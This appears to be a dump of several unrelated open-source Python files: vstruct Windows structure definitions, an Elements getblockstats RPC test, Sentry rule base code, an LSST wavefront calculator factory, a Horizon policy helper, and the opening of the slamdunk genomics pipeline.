self.glContext = v_ptr32()
self.LastStatusValue = v_uint32()
self.StaticUnicodeString = UNICODE_STRING()
self.StaticUnicodeBuffer = vstruct.VArray([ v_uint16() for i in xrange(261) ])
self._pad0e0c = v_bytes(size=2)
self.DeallocationStack = v_ptr32()
self.TlsSlots = vstruct.VArray([ v_ptr32() for i in xrange(64) ])
self.TlsLinks = LIST_ENTRY()
self.Vdm = v_ptr32()
self.ReservedForNtRpc = v_ptr32()
self.DbgSsReserved = vstruct.VArray([ v_ptr32() for i in xrange(2) ])
self.HardErrorMode = v_uint32()
self.Instrumentation = vstruct.VArray([ v_ptr32() for i in xrange(9) ])
self.ActivityId = GUID()
self.SubProcessTag = v_ptr32()
self.EtwLocalData = v_ptr32()
self.EtwTraceData = v_ptr32()
self.WinSockData = v_ptr32()
self.GdiBatchCount = v_uint32()
self.CurrentIdealProcessor = PROCESSOR_NUMBER()
self.GuaranteedStackBytes = v_uint32()
self.ReservedForPerf = v_ptr32()
self.ReservedForOle = v_ptr32()
self.WaitingOnLoaderLock = v_uint32()
self.SavedPriorityState = v_ptr32()
self.SoftPatchPtr1 = v_uint32()
self.ThreadPoolData = v_ptr32()
self.TlsExpansionSlots = v_ptr32()
self.MuiGeneration = v_uint32()
self.IsImpersonating = v_uint32()
self.NlsCache = v_ptr32()
self.pShimData = v_ptr32()
self.HeapVirtualAffinity = v_uint32()
self.CurrentTransactionHandle = v_ptr32()
self.ActiveFrame = v_ptr32()
self.FlsData = v_ptr32()
self.PreferredLanguages = v_ptr32()
self.UserPrefLanguages = v_ptr32()
self.MergedPrefLanguages = v_ptr32()
self.MuiImpersonation = v_uint32()
self.CrossTebFlags = v_uint16()
self.SameTebFlags = v_uint16()
self.TxnScopeEnterCallback = v_ptr32()
self.TxnScopeExitCallback = v_ptr32()
self.TxnScopeContext = v_ptr32()
self.LockCount = v_uint32()
self.SpareUlong0 = v_uint32()
self.ResourceRetValue = v_ptr32()
class tagWIN32HEAP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class DMM_COMMITVIDPNREQUEST_DIAGINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ClientType = v_uint32()
self.ReclaimClonedTarget = v_uint8()
self._pad0008 = v_bytes(size=3)
self.ModeChangeRequestId = v_uint32()
class IMAGE_DOS_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.e_magic = v_uint16()
self.e_cblp = v_uint16()
self.e_cp = v_uint16()
self.e_crlc = v_uint16()
self.e_cparhdr = v_uint16()
self.e_minalloc = v_uint16()
self.e_maxalloc = v_uint16()
self.e_ss = v_uint16()
self.e_sp = v_uint16()
self.e_csum = v_uint16()
self.e_ip = v_uint16()
self.e_cs = v_uint16()
self.e_lfarlc = v_uint16()
self.e_ovno = v_uint16()
self.e_res = vstruct.VArray([ v_uint16() for i in xrange(4) ])
self.e_oemid = v_uint16()
self.e_oeminfo = v_uint16()
self.e_res2 = vstruct.VArray([ v_uint16() for i in xrange(10) ])
self.e_lfanew = v_uint32()
class RTL_DYNAMIC_HASH_TABLE_ENTRY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Linkage = LIST_ENTRY()
self.Signature = v_uint32()
class TXN_PARAMETER_BLOCK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint16()
self.TxFsContext = v_uint16()
self.TransactionObject = v_ptr32()
class QUAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.UseThisFieldToCopy = v_uint64()
class _unnamed_12800(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.IoResourceRequirementList = v_ptr32()
class _unnamed_12803(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.WhichSpace = v_uint32()
self.Buffer = v_ptr32()
self.Offset = v_uint32()
self.Length = v_uint32()
class RTL_DYNAMIC_HASH_TABLE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flags = v_uint32()
self.Shift = v_uint32()
self.TableSize = v_uint32()
self.Pivot = v_uint32()
self.DivisorMask = v_uint32()
self.NumEntries = v_uint32()
self.NonEmptyBuckets = v_uint32()
self.NumEnumerators = v_uint32()
self.Directory = v_ptr32()
class _unnamed_12808(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Lock = v_uint8()
class _unnamed_12694(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_ptr32()
self.Key = v_uint32()
self.ByteOffset = LARGE_INTEGER()
class tagSERVERINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwSRVIFlags = v_uint32()
self.cHandleEntries = v_uint32()
self.mpFnidPfn = vstruct.VArray([ v_ptr32() for i in xrange(32) ])
self.aStoCidPfn = vstruct.VArray([ v_ptr32() for i in xrange(7) ])
self.mpFnid_serverCBWndProc = vstruct.VArray([ v_uint16() for i in xrange(31) ])
self._pad00e4 = v_bytes(size=2)
self.apfnClientA = PFNCLIENT()
self.apfnClientW = PFNCLIENT()
self.apfnClientWorker = PFNCLIENTWORKER()
self.cbHandleTable = v_uint32()
self.atomSysClass = vstruct.VArray([ v_uint16() for i in xrange(25) ])
self._pad0200 = v_bytes(size=2)
self.dwDefaultHeapBase = v_uint32()
self.dwDefaultHeapSize = v_uint32()
self.uiShellMsg = v_uint32()
self.MBStrings = vstruct.VArray([ tagMBSTRING() for i in xrange(11) ])
self.atomIconSmProp = v_uint16()
self.atomIconProp = v_uint16()
self.atomContextHelpIdProp = v_uint16()
self.atomFrostedWindowProp = v_uint16()
self.acOemToAnsi = vstruct.VArray([ v_uint8() for i in xrange(256) ])
self.acAnsiToOem = vstruct.VArray([ v_uint8() for i in xrange(256) ])
self.dwInstalledEventHooks = v_uint32()
self.aiSysMet = vstruct.VArray([ v_uint32() for i in xrange(97) ])
self.argbSystemUnmatched = vstruct.VArray([ v_uint32() for i in xrange(31) ])
self.argbSystem = vstruct.VArray([ v_uint32() for i in xrange(31) ])
self.ahbrSystem = vstruct.VArray([ v_ptr32() for i in xrange(31) ])
self.hbrGray = v_ptr32()
self.ptCursor = tagPOINT()
self.ptCursorReal = tagPOINT()
self.dwLastRITEventTickCount = v_uint32()
self.nEvents = v_uint32()
self.dtScroll = v_uint32()
self.dtLBSearch = v_uint32()
self.dtCaretBlink = v_uint32()
self.ucWheelScrollLines = v_uint32()
self.ucWheelScrollChars = v_uint32()
self.wMaxLeftOverlapChars = v_uint32()
self.wMaxRightOverlapChars = v_uint32()
self.cxSysFontChar = v_uint32()
self.cySysFontChar = v_uint32()
self.tmSysFont = tagTEXTMETRICW()
self.dpiSystem = tagDPISERVERINFO()
self.hIconSmWindows = v_ptr32()
self.hIcoWindows = v_ptr32()
self.dwKeyCache = v_uint32()
self.dwAsyncKeyCache = v_uint32()
self.cCaptures = v_uint32()
self.oembmi = vstruct.VArray([ tagOEMBITMAPINFO() for i in xrange(93) ])
self.rcScreenReal = tagRECT()
self.BitCount = v_uint16()
self.dmLogPixels = v_uint16()
self.Planes = v_uint8()
self.BitsPixel = v_uint8()
self._pad0f58 = v_bytes(size=2)
self.PUSIFlags = v_uint32()
self.uCaretWidth = v_uint32()
self.UILangID = v_uint16()
self._pad0f64 = v_bytes(size=2)
self.dwLastSystemRITEventTickCountUpdate = v_uint32()
self.adwDBGTAGFlags = vstruct.VArray([ v_uint32() for i in xrange(35) ])
self.dwTagCount = v_uint32()
self.dwRIPFlags = v_uint32()
class DEVICE_OBJECT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.Size = v_uint16()
self.ReferenceCount = v_uint32()
self.DriverObject = v_ptr32()
self.NextDevice = v_ptr32()
self.AttachedDevice = v_ptr32()
self.CurrentIrp = v_ptr32()
self.Timer = v_ptr32()
self.Flags = v_uint32()
self.Characteristics = v_uint32()
self.Vpb = v_ptr32()
self.DeviceExtension = v_ptr32()
self.DeviceType = v_uint32()
self.StackSize = v_uint8()
self._pad0034 = v_bytes(size=3)
self.Queue = _unnamed_12451()
self.AlignmentRequirement = v_uint32()
self.DeviceQueue = KDEVICE_QUEUE()
self.Dpc = KDPC()
self.ActiveThreadCount = v_uint32()
self.SecurityDescriptor = v_ptr32()
self.DeviceLock = KEVENT()
self.SectorSize = v_uint16()
self.Spare1 = v_uint16()
self.DeviceObjectExtension = v_ptr32()
self.Reserved = v_ptr32()
class _unnamed_12699(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.OutputBufferLength = v_uint32()
self.InputBufferLength = v_uint32()
self.IoControlCode = v_uint32()
self.Type3InputBuffer = v_ptr32()
class _unnamed_12510(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DeviceQueueEntry = KDEVICE_QUEUE_ENTRY()
self.Thread = v_ptr32()
self.AuxiliaryBuffer = v_ptr32()
self.ListEntry = LIST_ENTRY()
self.CurrentStackLocation = v_ptr32()
self.OriginalFileObject = v_ptr32()
class _unnamed_16591(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MinimumVector = v_uint32()
self.MaximumVector = v_uint32()
self.AffinityPolicy = v_uint16()
self.Group = v_uint16()
self.PriorityPolicy = v_uint32()
self.TargetedProcessors = v_uint32()
class _unnamed_16598(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MinimumChannel = v_uint32()
self.MaximumChannel = v_uint32()
class tagCLIENTINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.CI_flags = v_uint32()
self.cSpins = v_uint32()
self.dwExpWinVer = v_uint32()
self.dwCompatFlags = v_uint32()
self.dwCompatFlags2 = v_uint32()
self.dwTIFlags = v_uint32()
self.pDeskInfo = v_ptr32()
self.ulClientDelta = v_uint32()
self.phkCurrent = v_ptr32()
self.fsHooks = v_uint32()
self.CallbackWnd = CALLBACKWND()
self.dwHookCurrent = v_uint32()
self.cInDDEMLCallback = v_uint32()
self.pClientThreadInfo = v_ptr32()
self.dwHookData = v_uint32()
self.dwKeyCache = v_uint32()
self.afKeyState = vstruct.VArray([ v_uint8() for i in xrange(8) ])
self.dwAsyncKeyCache = v_uint32()
self.afAsyncKeyState = vstruct.VArray([ v_uint8() for i in xrange(8) ])
self.afAsyncKeyStateRecentDown = vstruct.VArray([ v_uint8() for i in xrange(8) ])
self.hKL = v_ptr32()
self.CodePage = v_uint16()
self.achDbcsCF = vstruct.VArray([ v_uint8() for i in xrange(2) ])
self.msgDbcsCB = tagMSG()
self.lpdwRegisteredClasses = v_ptr32()
class HWINSTA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class TL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.next = v_ptr32()
self.pobj = v_ptr32()
self.pfnFree = v_ptr32()
class IMAGE_NT_HEADERS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Signature = v_uint32()
self.FileHeader = IMAGE_FILE_HEADER()
self.OptionalHeader = IMAGE_OPTIONAL_HEADER()
class IO_STACK_LOCATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MajorFunction = v_uint8()
self.MinorFunction = v_uint8()
self.Flags = v_uint8()
self.Control = v_uint8()
self.Parameters = _unnamed_12471()
self.DeviceObject = v_ptr32()
self.FileObject = v_ptr32()
self.CompletionRoutine = v_ptr32()
self.Context = v_ptr32()
class tagTERMINAL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwTERMF_Flags = v_uint32()
self.spwndDesktopOwner = v_ptr32()
self.ptiDesktop = v_ptr32()
self.pqDesktop = v_ptr32()
self.dwNestedLevel = v_uint32()
self.pEventTermInit = v_ptr32()
self.rpdeskDestroy = v_ptr32()
self.pEventInputReady = v_ptr32()
class D3DKMDT_VIDPN_PRESENT_PATH(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.VidPnSourceId = v_uint32()
self.VidPnTargetId = v_uint32()
self.ImportanceOrdinal = v_uint32()
self.ContentTransformation = D3DKMDT_VIDPN_PRESENT_PATH_TRANSFORMATION()
self.VisibleFromActiveTLOffset = D3DKMDT_2DREGION()
self.VisibleFromActiveBROffset = D3DKMDT_2DREGION()
self.VidPnTargetColorBasis = v_uint32()
self.VidPnTargetColorCoeffDynamicRanges = D3DKMDT_COLOR_COEFF_DYNAMIC_RANGES()
self.Content = v_uint32()
self.CopyProtection = D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION()
self.GammaRamp = D3DKMDT_GAMMA_RAMP()
class tagMENULIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pNext = v_ptr32()
self.pMenu = v_ptr32()
class VK_VALUES_STRINGS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pszMultiNames = v_ptr32()
self.fReserved = v_uint8()
self._pad0008 = v_bytes(size=3)
class tagKL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = HEAD()
self.pklNext = v_ptr32()
self.pklPrev = v_ptr32()
self.dwKL_Flags = v_uint32()
self.hkl = v_ptr32()
self.spkf = v_ptr32()
self.spkfPrimary = v_ptr32()
self.dwFontSigs = v_uint32()
self.iBaseCharset = v_uint32()
self.CodePage = v_uint16()
self.wchDiacritic = v_uint16()
self.piiex = v_ptr32()
self.uNumTbl = v_uint32()
self.pspkfExtra = v_ptr32()
self.dwLastKbdType = v_uint32()
self.dwLastKbdSubType = v_uint32()
self.dwKLID = v_uint32()
class tagPOINT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.x = v_uint32()
self.y = v_uint32()
class RTL_USER_PROCESS_PARAMETERS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MaximumLength = v_uint32()
self.Length = v_uint32()
self.Flags = v_uint32()
self.DebugFlags = v_uint32()
self.ConsoleHandle = v_ptr32()
self.ConsoleFlags = v_uint32()
self.StandardInput = v_ptr32()
self.StandardOutput = v_ptr32()
self.StandardError = v_ptr32()
self.CurrentDirectory = CURDIR()
self.DllPath = UNICODE_STRING()
self.ImagePathName = UNICODE_STRING()
self.CommandLine = UNICODE_STRING()
self.Environment = v_ptr32()
self.StartingX = v_uint32()
self.StartingY = v_uint32()
self.CountX = v_uint32()
self.CountY = v_uint32()
self.CountCharsX = v_uint32()
self.CountCharsY = v_uint32()
self.FillAttribute = v_uint32()
self.WindowFlags = v_uint32()
self.ShowWindowFlags = v_uint32()
self.WindowTitle = UNICODE_STRING()
self.DesktopInfo = UNICODE_STRING()
self.ShellInfo = UNICODE_STRING()
self.RuntimeData = UNICODE_STRING()
self.CurrentDirectores = vstruct.VArray([ RTL_DRIVE_LETTER_CURDIR() for i in xrange(32) ])
self.EnvironmentSize = v_uint32()
self.EnvironmentVersion = v_uint32()
class _unnamed_16077(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Raw = _unnamed_16072()
class tagSHAREDINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.psi = v_ptr32()
self.aheList = v_ptr32()
self.HeEntrySize = v_uint32()
self.pDispInfo = v_ptr32()
self.ulSharedDelta = v_uint32()
self.awmControl = vstruct.VArray([ WNDMSG() for i in xrange(31) ])
self.DefWindowMsgs = WNDMSG()
self.DefWindowSpecMsgs = WNDMSG()
class tagIMC(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = THRDESKHEAD()
self.pImcNext = v_ptr32()
self.dwClientImcData = v_uint32()
self.hImeWnd = v_ptr32()
class IO_RESOURCE_REQUIREMENTS_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ListSize = v_uint32()
self.InterfaceType = v_uint32()
self.BusNumber = v_uint32()
self.SlotNumber = v_uint32()
self.Reserved = vstruct.VArray([ v_uint32() for i in xrange(3) ])
self.AlternativeLists = v_uint32()
self.List = vstruct.VArray([ IO_RESOURCE_LIST() for i in xrange(1) ])
class tagCARET(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.spwnd = v_ptr32()
self.fVisible = v_uint32()
self.iHideLevel = v_uint32()
self.x = v_uint32()
self.y = v_uint32()
self.cy = v_uint32()
self.cx = v_uint32()
self.hBitmap = v_ptr32()
self.hTimer = v_uint32()
self.tid = v_uint32()
self.xOwnDc = v_uint32()
self.yOwnDc = v_uint32()
self.cxOwnDc = v_uint32()
self.cyOwnDc = v_uint32()
|
tdudz/elements
|
refs/heads/elements-0.14.1
|
qa/rpc-tests/rpc_getblockstats.py
|
1
|
#!/usr/bin/env python3
# Copyright (c) 2017-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test getblockstats rpc call
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_jsonrpc,
connect_nodes_bi,
start_nodes,
)
import logging
import json
import os
import time
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(BitcoinTestFramework):
start_height = 101
max_stat_pos = 2
STATS_NEED_TXINDEX = [
'utxo_size_inc',
]
def add_options(self, parser):
parser.add_option('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_option('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def __init__(self):
super().__init__()
self.num_nodes = 2
self.extra_args = [['-txindex'], ['-paytxfee=0.003']]
self.setup_clean_chain = True
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, extra_args=self.extra_args)
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split=False
self.sync_all()
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
def generate_test_data(self, filename):
mocktime = time.time()
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(address=self.nodes[1].getnewaddress(), amount=10, subtractfeefromamount=True)
self.nodes[0].generate(1)
self.sync_all()
self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=True)
self.nodes[0].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=10, subtractfeefromamount=False)
self.nodes[1].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=1, subtractfeefromamount=True)
self.sync_all()
self.nodes[0].generate(1)
self.expected_stats = self.get_stats()
blocks = []
tip = self.nodes[0].getbestblockhash()
blockhash = None
height = 0
while tip != blockhash:
blockhash = self.nodes[0].getblockhash(height)
blocks.append(self.nodes[0].getblock(blockhash, 0))
height += 1
to_dump = {
'blocks': blocks,
'mocktime': int(mocktime),
'stats': self.expected_stats,
}
with open(filename, 'w') as f:
json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r') as f:
d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
# Set the timestamps from the file so that the nodes can get out of Initial Block Download
self.nodes[0].setmocktime(mocktime)
self.nodes[1].setmocktime(mocktime)
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
test_data = os.path.join(TESTSDIR, self.options.test_data)
if self.options.gen_test_data:
self.generate_test_data(test_data)
else:
self.load_test_data(test_data)
self.sync_all()
stats = self.get_stats()
expected_stats_noindex = []
for stat_row in stats:
expected_stats_noindex.append({k: v for k, v in stat_row.items() if k not in self.STATS_NEED_TXINDEX})
# Make sure all valid statistics are included but nothing else is
expected_keys = self.expected_stats[0].keys()
assert_equal(set(stats[0].keys()), set(expected_keys))
assert_equal(stats[0]['height'], self.start_height)
assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
for i in range(self.max_stat_pos+1):
logging.info('Checking block %d\n' % (i))
assert_equal(stats[i], self.expected_stats[i])
# Check selecting block by hash too
blockhash = self.expected_stats[i]['blockhash']
stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
assert_equal(stats_by_hash, self.expected_stats[i])
# Check with the node that has no txindex
stats_no_txindex = self.nodes[1].getblockstats(hash_or_height=blockhash, stats=list(expected_stats_noindex[i].keys()))
assert_equal(stats_no_txindex, expected_stats_noindex[i])
# Make sure each stat can be queried on its own
for stat in expected_keys:
for i in range(self.max_stat_pos+1):
result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
assert_equal(list(result.keys()), [stat])
if result[stat] != self.expected_stats[i][stat]:
logging.info('result[%s] (%d) failed, %r != %r' % (
stat, i, result[stat], self.expected_stats[i][stat]))
assert_equal(result[stat], self.expected_stats[i][stat])
# Make sure only the selected statistics are included (more than one)
some_stats = {'minfee', 'maxfee'}
stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
assert_equal(set(stats.keys()), some_stats)
# Test invalid parameters raise the proper json exceptions
tip = self.start_height + self.max_stat_pos
assert_raises_jsonrpc(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
self.nodes[0].getblockstats, hash_or_height=tip+1)
assert_raises_jsonrpc(-8, 'Target block height %d is negative' % (-1),
self.nodes[0].getblockstats, hash_or_height=-1)
# Make sure not valid stats aren't allowed
inv_sel_stat = 'asdfghjkl'
inv_stats = [
[inv_sel_stat],
['minfee' , inv_sel_stat],
[inv_sel_stat, 'minfee'],
['minfee', inv_sel_stat, 'maxfee'],
]
for inv_stat in inv_stats:
assert_raises_jsonrpc(-8, 'Invalid selected statistic %s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
# Make sure we aren't always returning inv_sel_stat as the culprit stat
assert_raises_jsonrpc(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
assert_raises_jsonrpc(-8, 'One or more of the selected stats requires -txindex enabled',
self.nodes[1].getblockstats, hash_or_height=self.start_height + self.max_stat_pos)
# Mainchain's genesis block shouldn't be found on regtest
assert_raises_jsonrpc(-5, 'Block not found', self.nodes[0].getblockstats,
hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
if __name__ == '__main__':
GetblockstatsTest().main()
|
fotinakis/sentry
|
refs/heads/master
|
src/sentry/rules/base.py
|
6
|
"""
sentry.rules.base
~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
Rules apply either before an event gets stored, or immediately after.
Basic actions:
- I want to get notified when [X]
- I want to group events when [X]
- I want to scrub data when [X]
Expanded:
- I want to get notified when an event is first seen
- I want to get notified when an event is marked as a regression
- I want to get notified when the rate of an event increases by [100%]
- I want to get notified when an event has been seen more than [100] times
- I want to get notified when an event matches [conditions]
- I want to group events when an event matches [conditions]
Rules get broken down into two phases:
- An action
- A rule condition
A condition itself may actually be any number of things, but that is determined
by the rule's logic. Each rule condition may be associated with a form.
- [ACTION:I want to get notified when] [RULE:an event is first seen]
- [ACTION:I want to group events when] [RULE:an event matches [FORM]]
"""
from __future__ import absolute_import
import logging
import re
import six
from collections import namedtuple
from django.utils.safestring import mark_safe
from sentry.utils.html import escape
CallbackFuture = namedtuple('CallbackFuture', ['callback', 'kwargs'])
class RuleDescriptor(type):
def __new__(cls, *args, **kwargs):
new_cls = super(RuleDescriptor, cls).__new__(cls, *args, **kwargs)
new_cls.id = '%s.%s' % (new_cls.__module__, new_cls.__name__)
return new_cls
@six.add_metaclass(RuleDescriptor)
class RuleBase(object):
label = None
form_cls = None
logger = logging.getLogger('sentry.rules')
def __init__(self, project, data=None, rule=None):
self.project = project
self.data = data or {}
self.had_data = data is not None
self.rule = rule
def get_option(self, key):
return self.data.get(key)
def get_form_instance(self):
if self.had_data:
data = self.data
else:
data = None
return self.form_cls(data)
def render_label(self):
return self.label.format(**self.data)
def render_form(self):
if not self.form_cls:
return self.label
form = self.get_form_instance()
def replace_field(match):
field = match.group(1)
return six.text_type(form[field])
return mark_safe(re.sub(r'{([^}]+)}', replace_field, escape(self.label)))
def validate_form(self):
if not self.form_cls:
return True
form = self.get_form_instance()
return form.is_valid()
def future(self, callback, **kwargs):
return CallbackFuture(
callback=callback,
kwargs=kwargs,
)
class EventState(object):
def __init__(self, is_new, is_regression, is_sample):
self.is_new = is_new
self.is_regression = is_regression
self.is_sample = is_sample,
|
lsst-ts/ts_wep
|
refs/heads/master
|
python/lsst/ts/wep/ctrlIntf/WEPCalculationFactory.py
|
1
|
# This file is part of ts_wep.
#
# Developed for the LSST Telescope and Site Systems.
# This product includes software developed by the LSST Project
# (https://www.lsst.org).
# See the COPYRIGHT file at the top-level directory of this distribution
# for details of code ownership.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
from lsst.ts.wep.Utility import CamType
from lsst.ts.wep.ctrlIntf.WEPCalculationOfLsstCam import WEPCalculationOfLsstCam
from lsst.ts.wep.ctrlIntf.WEPCalculationOfLsstFamCam import WEPCalculationOfLsstFamCam
from lsst.ts.wep.ctrlIntf.WEPCalculationOfComCam import WEPCalculationOfComCam
class WEPCalculationFactory(object):
"""Factory for creating the correct WEP calculation based off the camera
type currently being used."""
def __init__(self):
"""Construct an WEP calculation factory object."""
super().__init__()
@staticmethod
def getCalculator(camType, isrDir):
"""Get a calculator to process wavefront image.
Parameters
----------
camType : enum 'CamType'
The camera type to get the wavefront calculator for.
isrDir : str
Instrument signature remocal (ISR) directory. This directory will
have the input and output that the data butler needs.
Returns
-------
WEPCalculationOfLsstCam, WEPCalculationOfLsstFamCam, or
WEPCalculationOfComCam
Concrete child class of WEPCalculation class.
Raises
------
ValueError
This camera type is not supported.
"""
if camType == CamType.LsstCam:
return WEPCalculationOfLsstCam(isrDir)
elif camType == CamType.LsstFamCam:
return WEPCalculationOfLsstFamCam(isrDir)
elif camType == CamType.ComCam:
return WEPCalculationOfComCam(isrDir)
else:
raise ValueError("This camera type is not supported.")
if __name__ == "__main__":
pass
|
Solinea/horizon
|
refs/heads/master
|
openstack_dashboard/policy.py
|
55
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf import settings
def check(actions, request, target=None):
"""Wrapper of the configurable policy method."""
policy_check = getattr(settings, "POLICY_CHECK_FUNCTION", None)
if policy_check:
return policy_check(actions, request, target)
return True
class PolicyTargetMixin(object):
"""Mixin that adds the get_policy_target function
policy_target_attrs - a tuple of tuples which defines
the relationship between attributes in the policy
target dict and attributes in the passed datum object.
policy_target_attrs can be overwritten by sub-classes
which do not use the default, so they can neatly define
their policy target information, without overriding the
entire get_policy_target function.
"""
policy_target_attrs = (("project_id", "tenant_id"),
("user_id", "user_id"),
("domain_id", "domain_id"))
def get_policy_target(self, request, datum=None):
policy_target = {}
for policy_attr, datum_attr in self.policy_target_attrs:
if datum:
policy_target[policy_attr] = getattr(datum, datum_attr, None)
else:
policy_target[policy_attr] = None
return policy_target
|
da1z/intellij-community
|
refs/heads/master
|
python/testData/refactoring/move/docstringTypes/before/src/c.py
|
83
|
def f(x):
'''Returns the argument.
:type x: a.C
:rtype: a.C
'''
return x
|
t-neumann/slamdunk
|
refs/heads/master
|
slamdunk/slamdunk.py
|
1
|
#!/usr/bin/env python
# Copyright (c) 2015 Tobias Neumann, Philipp Rescheneder.
#
# This file is part of Slamdunk.
#
# Slamdunk is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Slamdunk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#########################################################################
# Main routine for the SLAMdunk analyzer
#########################################################################
# Imports
#########################################################################
from __future__ import print_function
import sys, os, random
from time import sleep
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, SUPPRESS
from os.path import basename
from joblib import Parallel, delayed
from slamdunk.dunks import tcounter, mapper, filter, deduplicator, snps
from slamdunk.utils.misc import replaceExtension, estimateMaxReadLength
from slamdunk.version import __version__
########################################################################
# Global variables
########################################################################
printOnly = False
verbose = False
mainOutput = sys.stderr
logToMainOutput = False
########################################################################
# Routine definitions
########################################################################
def getLogFile(path):
if(logToMainOutput):
return mainOutput
else:
log = open(path, "a")
return log
def closeLogFile(log):
if(not logToMainOutput):
log.close()
def message(msg):
print(msg, file=mainOutput)
def error(msg, code=-1):
print(msg, file=mainOutput)
sys.exit(code)
def stepFinished():
print(".", end="", file=mainOutput)
def dunkFinished():
print("", file=mainOutput)
def createDir(directory):
if not os.path.exists(directory):
message("Creating output directory: " + directory)
os.makedirs(directory)
def readSampleFile(fileName):
samples = []
infos = []
